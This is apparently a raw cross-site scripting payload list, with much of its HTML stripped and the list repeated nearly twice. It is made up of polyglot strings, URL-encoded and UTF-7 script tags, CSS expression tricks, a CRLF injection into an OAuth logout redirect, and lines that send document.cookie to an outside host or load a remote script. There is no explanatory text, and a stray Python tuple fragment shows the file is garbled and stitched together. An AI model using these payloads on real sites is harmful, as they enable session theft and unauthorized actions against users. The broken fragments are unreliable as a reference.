"> "> "> "> "> ">Clickme ">Clickme ">Clickme ">click "> ">clickme "> "> "> "> "> ">Clickme ">Clickme ">Clickme "> ">clickmeonchrome ">hoveme "> "> ">DragMe '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) \x3Cscript>javascript:alert(1) '"`> javascript:alert(1)javascript:alert(1)javascript:alert(1) --> --> --> --> --> `"'> test test test test test test test test test test test test test test "'`>ABCDEF "'`>ABCDEF '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/> "/> "/> "/> "/> "/> "/> "/> "/> `"'> `"'> `"'> `"'> `"'> `"'> `"'> ">/¿mycookies='+document['cookie"])()> alert(1)0 "> "> foo=">"> foo=">"> <% foo> XXX X @import "data:,*%7bx:expression(javascript:alert(1))%7D"; XXXXXX X XXX XXX / style=x:expression\28javascript:alert(1)\29> X X X X XXX XXX &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi & < XSS XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)"> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X && javascript:alert(1); ]] test1 test1 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> '';!--"=&{()} xxs link xxs link "> perl -e 'print "";' > out < XSS exp/* ¼script¾alert(¢XSS¢)¼/script¾ echo('alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ X |\>'' X http://www. style="x:"> <--` --!> x "> CLICKME click Click Me /?xss=\"" -mr " " -mr " oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a / ?lang=es&mode=%22%3E%3Cscript%3Ealert(hacked by hackingyseguridad.com)%3C/script%3E /wp-login.php?redirect_to=DEMO"> /page?parameter= "> < '> '> \";alert('XSS');// %3cscript%3ealert("WXSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert "> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()}
hoveme "> "> ">DragMe '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) \x3Cscript>javascript:alert(1) '"`> javascript:alert(1)javascript:alert(1)javascript:alert(1) --> --> --> --> --> `"'> test test test test test test test test test test test test test test "'`>ABCDEF "'`>ABCDEF '`"><\x3Cscript>javascript:alert(1) '`"><\x00script>javascript:alert(1) "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> `"'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "`'> "/> "/> "/> "/> "/> "/> "/> "/> "/> `"'> `"'> `"'> `"'> `"'> `"'> `"'> ">/¿mycookies='+document['cookie"])()> alert(1)0 "> "> foo=">"> foo=">"> <% foo> XXX X @import "data:,*%7bx:expression(javascript:alert(1))%7D"; XXXXXX X XXX XXX / style=x:expression\28javascript:alert(1)\29> X X X X XXX XXX &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi & < XSS XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)"> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X && javascript:alert(1); ]] test1 test1 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> '';!--"=&{()} xxs link xxs link "> perl -e 'print "";' > out < XSS exp/* ¼script¾alert(¢XSS¢)¼/script¾ echo('alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/ X |\>'' X http://www. style="x:"> <--` --!> x "> CLICKME click Click Me /?xss=\"" -mr " " -mr " oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a / ?lang=es&mode=%22%3E%3Cscript%3Ealert(hacked by hackingyseguridad.com)%3C/script%3E /wp-login.php?redirect_to=DEMO"> /page?parameter= "> < '> '> \";alert('XSS');// %3cscript%3ealert("WXSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert "> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()}
&& javascript:alert(1);